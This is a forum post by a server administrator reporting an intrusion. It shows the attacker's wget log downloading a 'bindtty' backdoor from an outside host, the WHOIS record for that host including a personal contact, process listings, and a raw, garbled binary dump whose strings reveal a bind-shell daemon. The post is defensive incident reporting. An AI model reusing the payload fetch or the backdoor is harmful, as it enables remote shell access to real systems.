Bindtty Hack, Take A Look

This showed up in the logs of one of my servers!Bindtty Hack, Take A Look


--01:24:39-- http://raky.home.cosmic-cp/
=> `index.html.1'
Resolving raky.home.cosmic-cp... failed: Host not found.
--01:26:41-- http://raky.home.cosmic-cow.net/bindtty
=> `bindtty'
Resolving raky.home.cosmic-cow.net... done.
Connecting to raky.home.cosmic-cow.net[69.31.32.153]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12,637 [text/plain]

0K .......... .. 100% 108.25 KB/s

01:26:47 (108.25 KB/s) - `bindtty' saved [12637/12637]
Search results for: ! NET-69-31-32-0-1


OrgName: Quantum Tech Pty Ltd
OrgID: QTPL
Address: P.O. Box 6111
Address: Girrawheen
City: Perth
StateProv: WA
PostalCode: 6064
Country: AU

NetRange: 69.31.32.0 - 69.31.39.255
CIDR: 69.31.32.0/21
NetName: NLYR-69-31-32-0-1
NetHandle: NET-69-31-32-0-1
Parent: NET-69-31-0-0-1
NetType: Reallocated
NameServer: NS1.QUANTUM-TECH.COM
NameServer: NS2.QUANTUM-TECH.COM
Comment:
RegDate: 2003-04-12
Updated: 2003-04-12

OrgTechHandle: MVA6-ARIN
OrgTechName: Van Essen, Mike
OrgTechPhone: +61 8 9343 0428
OrgTechEmail: mike@quantumtech.net.au

# ARIN WHOIS database, last updated 2004-07-04 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.


Called this number and they are saying that they do not know any mike or quantumtech.

PS -aux
---------------------------------------------------------------------------------
xxxxx 15978 0.0 0.0 1484 4 ? S Jul01 0:00 ./bindtty
xxxxx 14456 0.0 0.0 2380 48 ? S Jul01 0:00 SCREEN
xxxxx 14457 0.0 0.0 2204 52 pts/0 S Jul01 0:00 /bin/sh
xxxxx 14463 0.0 0.0 1404 8 pts/0 S Jul01 0:00 ./suck
xxxxx 14464 0.0 0.0 1384 4 pts/0 S Jul01 0:00 ./suck
------------------------------------------------------------------------------------

Anyone seen this before?

Pulling up http://raky.home.cosmic-cow.net/bindtty

Gives the following:
ELF    €‰4  4  (    4 4€4€À À    ô

ô€ô€     € €X X    X X¦X¦| „    d

d¦d¦È È        /lib/ld-linux.so.2    GNU 

  % %   # !   
 

 $        

    
 

   " k h‡|  õ x‡q  5 ˆ‡Ý  ¡

˜‡Z  ˆ ¨‡Û  O ¸‡ø  H ȇ”  ” ؇  ' è‡g  

ø‡›  d ˆx  š ˆ9  î (ˆ.  æ 8ˆ6  Ô§   

Hˆž  { Xˆ6  Ú hˆ¯  \ xˆ:  È ˆˆ   < ˜ˆ:  §

¨ˆ9  v ¸ˆ9  . Ȉ'  á ؈|  V èˆ6  ´ øˆÙ  

‰<  ® ‰  ¹ _•   q (‰:  ¦ 8‰4  A H‰9  

X‰|  û h‰0  libc.so.6 strcpy waitpid ioctl stdout execve memcpy

perror dup2 socket select fflush bzero setpgid accept write kill bind chdir memchr signal read

htonl listen fork sprintf htons exit _IO_stdin_used __libc_start_main strlen open vhangup setsid

close __gmon_start__ GLIBC_2.0                                

       ii

 Ч# Ô§ L§ P§ T§ X§ \§

`§ d§ h§ l§ p§
t§ x§ |§
€§ „§ ˆ§ Œ§

§ ”§ ˜§ œ§ _§ ¤§ ¨§ ¬§ °§ ´§ ¸§ ¼§

À§ ħ! ȧ" ̧$ U‰åƒìèY èÀ èû
ÉÃ ÿ5D§ÿ%H§ ÿ%L§h éàÿÿÿÿ%P§h

éÐÿÿÿÿ%T§h éÀÿÿÿÿ%X§h é°ÿÿÿÿ%\§h é_ÿÿÿÿ%`§h( éÿÿÿÿ%d§h0 é€ÿÿÿÿ%h§h8

épÿÿÿÿ%l§h@ é`ÿÿÿÿ%p§hH éPÿÿÿÿ%t§hP é@ÿÿÿÿ%x§hX é0ÿÿÿÿ%|§h` é ÿÿÿÿ%€§hh

éÿÿÿÿ%„§hp é ÿÿÿÿ%ˆ§hx éðþÿÿÿ%Œ§h€ éàþÿÿÿ%§hˆ éÐþÿÿÿ%”§h éÀþÿÿÿ%˜§h˜

é°þÿÿÿ%œ§h_ é_þÿÿÿ%_§h¨ éþÿÿÿ%¤§h° é€þÿÿÿ%¨§h¸ épþÿÿÿ%¬§hÀ é`þÿÿÿ%°§hÈ

éPþÿÿÿ%´§hÐ é@þÿÿÿ%¸§hØ é0þÿÿÿ%¼§hà é þÿÿÿ%À§hè éþÿÿÿ%ħhð é þÿÿÿ%ȧhø

éðýÿÿÿ%̧h  éàýÿÿ 1í^‰áƒäðPTRh•hà”QVhhŒèçþÿÿôU‰åSè [Ã“ P‹ƒ

…ÀtÿЋ]üÉАU‰åƒì€=ا u-¡`¦‹…Òt¶

ƒÀ£`¦ÿÒ¡`¦‹…ÒuëÆاÉÉöU‰åƒì¡<§…Àt¸

…Àt Ç$<§èÌuû÷‰ì]ÃU‰åƒìh¡¤•‰EØ¡¨•‰EÜ¡¬•‰Eà¡°•‰E䶴•ˆE衵•‰E¸¡¹•‰E¼¡½•‰EÀ¡Á•

‰EĶŕˆEȋE ‰$èËýÿÿ‰E´‹E ‰D$‹E‰$è¶þÿÿ‹E´‹U‹EÁøƒà¶D(؈‹E´EP‹Eƒà¶D(¸ˆ‹E´E

ƒÀÆ ÉÃU‰åì( ÇD$ Ç$ƕèÍýÿÿ‰…ðýÿÿ‹…ðýÿÿ‰$èYüÿÿDžôýÿÿ ½ôýÿÿÿ ~é´

…øýÿÿ‰D$ÇD$Е‹…ôýÿÿ‰$èÞþÿÿÇD$ …øýÿÿ‰$èhýÿÿ‰Â‹E ‰‹E ƒ8

yë`…øýÿÿ‰D$ÇD$ٕ‹…ôýÿÿ‰$è—þÿÿÇD$ …øýÿÿ‰$è!ýÿÿ‰Â‹E‰‹Eƒ8 y‹E ‹ ‰$è¥ûÿÿë Džìýÿÿ

덅ôýÿÿÿ é;ÿÿÿDžìýÿÿ ‹…ìýÿÿÉÃU‰åƒìÇD$ ŒÇ$ èŽûÿÿÇD$ ÇD$

Ç$ÿÿÿÿèüÿÿÉÃU‰åƒìÇD$ Ç$ èÖüÿÿÇD$ Ç$ èÂüÿÿÉÃU‰åWìtˆ ƒäð¸ )ÄÇD$ ÇD$

Ç$ è°üÿÿ‰Eă}Ä yÇ$â•èÛúÿÿDž´wþÿ é  ÇD$ E؉$èüÿÿfÇEØ Ç$ è÷úÿÿ‰EÜÇ$³

è(üÿÿf‰EÚÇD$ E؉D$‹Eĉ$èªûÿÿ…ÀyÇ$é•èjúÿÿDž´wþÿ éš ÇD$

‹Eĉ$èØúÿÿ…ÀyÇ$î•è8úÿÿDž´wþÿ éh Ç$õ•è=ûÿÿ¡Ô§‰$è@úÿÿèúÿÿ‰Eôƒ}ô

t"‹Eô‰D$Ç$ –èûÿÿDž´wþÿ é è{úÿÿÇ$–èŸúÿÿÇD$ Ç$–è ûÿÿ‰EôÇD$

‹Eô‰$èµúÿÿÇD$ ‹Eô‰$è¢úÿÿÇD$ ‹Eô‰$èúÿÿ‹Eô‰$èdùÿÿÇD$ Ç$ è€ùÿÿÇD$ ŒÇ$

èlùÿÿÇE¼ E¼‰D$EȉD$‹Eĉ$è¬ùÿÿ‰EÀƒ}À yëÕè,ùÿÿ‰Eôƒ}ô …> Džÿÿ%–Džÿÿ(–Dž ÿÿ

…xþÿ‰…{ÿÿÇD$–ÇD$+–…xþÿ‰$èwúÿÿDžyþÿ ÇD$ 

•yþÿ‹…yþÿÁà‰D$‹EÀ‰$èdúÿÿ‰…yþÿ‹yþÿ•yþÿ‹…yþÿÁà‰„{ÿÿ…yþÿÿ ½yþÿÿ (½yþÿÿ

~‹…yþÿÁàUøÐ-à‡ €8
…vÿÿÿ‹…yþÿDŽ…{ÿÿ ÇD$ Ç$ èþøÿÿE°‰D$E´‰$èbûÿÿ…À…ƒ

¡3–‰…èwþÿ¡7–‰…ìwþÿ¡;–‰…ðwþÿ¡?–‰…ôwþÿ¡C–‰…øwþÿ·G–f‰…üwþÿ…èwþÿ‰$èøÿÿ‰D$…èwþÿ‰D$

‹EÀ‰$èh÷ÿÿ‹EÀ‰$èm÷ÿÿÇ$ èáøÿÿè|÷ÿÿ‰E¸ƒ}¸ …Å ‹E°‰$èD÷ÿÿèï÷ÿÿÇD$T

‹E´‰$è¼øÿÿ‹EÀ‰$è!÷ÿÿ‹Eĉ$è÷ÿÿÇD$ Ç$ è2÷ÿÿÇD$ Ç$ è÷ÿÿÇD$ ‹E´‰$èû÷ÿÿÇD$

‹E´‰$èè÷ÿÿÇD$

‹E´‰$èÕ÷ÿÿ‹E´‰$èªöÿÿ…{ÿÿ‰D$…ÿÿ‰D$Ç$I–èúöÿÿ‹E´‰$èöÿÿÇD$8ŒÇ$ è›öÿÿÇD$8ŒÇ$

è‡öÿÿ¸ ¹ ½(ÿÿÿüó«‰È‰…äwþÿ‰ø‰…àwþÿ‹E°‰ÂÁê‹E°ƒà«„•(ÿÿÿ‹EÀ‰ÂÁê‹EÀƒà«„•(ÿÿÿÇD$

ÇD$ ÇD$ …(ÿÿÿ‰D$‹E°;EÀ~ ‹E°@‰…°wþÿë
‹UÀB‰•°wþÿ‹…°wþÿ‰$è
öÿÿ…Àyé£

‹E°‰Âƒâ‹E°Á裔…(ÿÿÿ’À„ÀtYÇD$ € …(ÿÿ‰D$‹E°‰$èW÷ÿÿ‰…àwþÿƒ½àwþÿ éU

‹…àwþÿ‰D$…(ÿÿ‰D$‹EÀ‰$è4õÿÿ…Àé- ‹EÀ‰Âƒâ‹EÀÁ裔…(ÿÿÿ’À„À„Ãþÿÿ…(ÿÿ‰…ÜwþÿÇD$ €

…(ÿÿ‰D$‹EÀ‰$èÑöÿÿ‰…àwþÿƒ½àwþÿ éÏ …(ÿÿ‹•àwþÿ‰T$ÇD$ ‰$è=õÿÿ‰…äwþÿƒ½äwþÿ „u

•(ÿÿ‹…äwþÿ)Љ‹…àwþÿ)Љ…Äwþÿƒ½Äwþÿ~
DžÄwþÿ ‹…Äwþÿ‰D$‹…äwþÿ‰D$…Èwþÿ‰$è§õÿÿƒ½Äwþÿ*¸

+…Äwþÿ‰D$…Èwþÿ…Äwþÿ‰D$‹EÀ‰$èöÿÿfDž¾wþÿ fDž¼wþÿ

¶…ÉwþÿÁàf¶•ÊwþÿÐf‰…ºwþÿ¶…ËwþÿÁàf¶•ÌwþÿÐf‰…¸wþÿ…¸wþÿ‰D$ÇD$T ‹E°‰$èOõÿÿÇD$ Ç$

è[õÿÿ•(ÿÿ‹…äwþÿ)ЉD$…(ÿÿ‰D$‹E°‰$ètóÿÿ…(ÿÿ…àwþÿ+…äwþÿƒè‰…Äwþÿƒ½Äwþÿ

Žýÿÿ‹…Äwþÿ‰D$‹…äwþÿƒÀ‰D$‹E°‰$è*óÿÿéÞüÿÿ‹…àwþÿ‰D$‹…Üwþÿ‰D$‹E°‰$èóÿÿ…À·üÿÿ‹EÀ‰$èóÿÿ‹E

ĉ$èøòÿÿ‹E°‰$èíòÿÿÇD$ ÇD$ ‹E¸‰$è¢óÿÿèóÿÿÇ$

èAôÿÿ‹EÀ‰$è¶òÿÿéuùÿÿ‹…´wþÿ‹}üÉАU‰åVS1ÛèTòÿÿ¸X¦-X¦Áø9Ãs‰ÆÿX¦C9órô[^]ÃU¸X

¦-X¦Áø‰åƒì‰]ü…ÀXÿu ‹]ü‰ì]éH ÿX¦‰ØK…Àuòë吐U‰åSƒì¡,§»,§ƒøÿtv ¼'

ƒëÿЋƒøÿuôX[]ÃU‰åSè [Ã· Rè:ôÿÿ‹]üÉà    pqrstuvwxyzabcde 0123456789abcdef /dev/ptmx

/dev/pty /dev/tty socket bind listen Daemon is starting... OK, pid = %d
/ /dev/null sh -i

HOME=%s Can't fork pty, bye!
/bin/sh 8§  @‡
€• (

¨„ X‚
    @§     8† (†   

þÿÿo†ÿÿÿo ðÿÿo¼… ÿÿÿÿ ÿÿÿÿ d¦



n‡~‡Ž‡ž‡®‡¾‡·އî‡þ‡ˆˆ.ˆ>ˆNˆ^ˆnˆ~ˆŽˆžˆ®ˆ¾ˆΈވî

ˆþˆ‰‰.‰>‰N‰^‰n‰ GCC: (GNU) 3.2.3 20030422 (Gentoo Linux 1.4 3.2.3-r3,

propolice) GCC: (GNU) 3.2.3 20030422 (Gentoo Linux 1.4 3.2.3-r3, propolice) GCC: (GNU) 3.2.3

20030422 (Gentoo Linux 1.4 3.2.3-r3, propolice) GCC: (GNU) 3.2.3 20030422 (Gentoo Linux 1.4

3.2.3-r3, propolice) GCC: (GNU) 3.2.3 20030422 (Gentoo Linux 1.4 3.2.3-r3, propolice) GCC:

(GNU) 3.2.3 20030422 (Gentoo Linux 1.4 3.2.3-r3, propolice) GCC: (GNU) 3.2.3 20030422 (Gentoo

Linux 1.4 3.2.3-r3, propolice) ,   €• @‡ ¤‰" $  _ 

–• U‡ œ  

/var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/buildhere/csu/crti.S

/var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/csu GNU AS 2.14.90.0.6 €œ   ¦

/var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/buildhere/csu/crtn.S

/var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/csu GNU AS 2.14.90.0.6 € % 

% ¢  Y û


/var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/buildhere/csu crti.S  ۥ2,Wd 

@‡",:  ¤‰ ,Wdd,,-: €  Y û


/var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/buildhere/csu crtn.S  –•: 

U‡   .symtab .strtab .shstrtab .interp .note.ABI-tag .hash .dynsym .dynstr

.gnu.version .gnu.version_r .rel.dyn .rel.plt .init .text .fini .rodata .eh_frame .data .dynamic

.ctors .dtors .jcr .got .bss .comment .debug_aranges .debug_info .debug_abbrev .debug_line

   ô€ô   #   

 1   (( 0    7  X‚X P    

?   ¨„¨   G ÿÿÿo ¼…¼ J    T þÿÿo

†    c  (†(     l  8†8 

   u   @‡@   p   X‡X   

{   €‰€     €•€   ‡  

œ•œ µ     T–T   ™   X¦X

 Ÿ   d¦d È    ¨   ,§,   ¯ 

 4§4   ¶   <§<   »   @§@ ”

  À   Ô§Ô   Å  Ô Î  Î

 ¨ X  Ý   @  é  @

 ÷  ` *    Š  

  h" à  R    H+  

ô€      (   X‚   ¨„   ¼…

  †   (†   8†  @‡ 
X‡  €‰

 ۥ 
œ•   T–   X¦   d¦   ,§

  4§   <§   @§   Ô§    

            

   ñÿ  ñÿ  ñÿT  ñÿ_  ñÿj 

ñÿ_  ñÿ  ñÿ_  ñÿ  ñÿ  ñÿ 

ñÿT  ñÿ_  ñÿ³  ñÿº  ñÿ   ñÿF 

ñÿº  ñÿ  ñÿ  ñÿ  ñÿT  ñÿº 

ñÿQ ¤‰  a  ñÿl ,§   z 4§   ˆ T–   › <§  

¨ `¦   ¬ ا   ¸ Љ  Î Š  a  ñÿÚ 0§  

ç 8§   ô T–    <§    P•  $  ñÿ  

ñÿF  ñÿ$  ñÿ  ñÿ  ñÿ  ñÿT 

ñÿ$  ñÿj  ñÿt  ñÿ d¦   ˆ h‡|  ™ 8Œ0 

¡ x‡q  ² Œ8  ¼ œ•   à ˆ‡Ý  Õ ˜‡Z  å ¨‡Û 

÷ ¸‡ø   X¦  ñÿ ȇ”  , ؇  = \¦  J •8

 Z è‡g  l ø‡›  ~ ˆx   @‡ 
– ˆ9  ¨ (ˆ.

 º 8ˆ6  Í Ô§   ß Hˆž  ò îŠ  û €‰   Xˆ6 

 hˆ¯  % 8Š¶  - X¦  ñÿ@ à”0  P Ô§  ñÿ\ hŒj 

a xˆ:  t ˆˆ   ‘ X¦  ñÿ¢ ˜ˆ:  ² X¦  ½ ¨ˆ9 

Ï ¸ˆ9  ß €• 
å Ȉ'  ÷ ؈|   èˆ6   øˆÙ 

( Ô§  ñÿ/ @§   E ܧ  ñÿJ ‰<  [ ‰  l X¦ 

ñÿ _•   Ž (‰:  ž 8‰4  ± X¦   ¾ H‰9  Ð

ä X‰|  ô  h‰0  <command line>

/var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/buildhere/config.h <built-in> abi-note.S

/var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/buildhere/csu/abi-tag.h init.c

/var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/buildhere/csu/crti.S

/var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/buildhere/csu/defs.h initfini.c call_gmon_start

crtstuff.c __CTOR_LIST__ __DTOR_LIST__ __EH_FRAME_BEGIN__ __JCR_LIST__ p.0 completed.1

__do_global_dtors_aux frame_dummy __CTOR_END__ __DTOR_END__ __FRAME_END__ __JCR_END__

__do_global_ctors_aux /var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/buildhere/csu/crtn.S

bindtty.c elf-init.c _DYNAMIC write@@GLIBC_2.0 hangout close@@GLIBC_2.0 sig_child _fp_hw

perror@@GLIBC_2.0 fork@@GLIBC_2.0 signal@@GLIBC_2.0 fflush@@GLIBC_2.0 __fini_array_end

select@@GLIBC_2.0 htonl@@GLIBC_2.0 __dso_handle __libc_csu_fini execve@@GLIBC_2.0

memchr@@GLIBC_2.0 accept@@GLIBC_2.0 _init listen@@GLIBC_2.0 setsid@@GLIBC_2.0 vhangup@@GLIBC_2.0

stdout@@GLIBC_2.0 waitpid@@GLIBC_2.0 open_tty _start chdir@@GLIBC_2.0 strlen@@GLIBC_2.0 get_tty

__fini_array_start __libc_csu_init __bss_start main setpgid@@GLIBC_2.0

__libc_start_main@@GLIBC_2.0 __init_array_end dup2@@GLIBC_2.0 data_start printf@@GLIBC_2.0

bind@@GLIBC_2.0 _fini memcpy@@GLIBC_2.0 open@@GLIBC_2.0 bzero@@GLIBC_2.0 exit@@GLIBC_2.0 _edata

_GLOBAL_OFFSET_TABLE_ _end ioctl@@GLIBC_2.0 htons@@GLIBC_2.0 __init_array_start _IO_stdin_used

kill@@GLIBC_2.0 sprintf@@GLIBC_2.0 __data_start socket@@GLIBC_2.0 _Jv_RegisterClasses

read@@GLIBC_2.0 __gmon_start__ strcpy@@GLIBC_2.0

Holy??Bindtty Hack, Take A Look I don't like the looks of this..

 

 

 

 

Top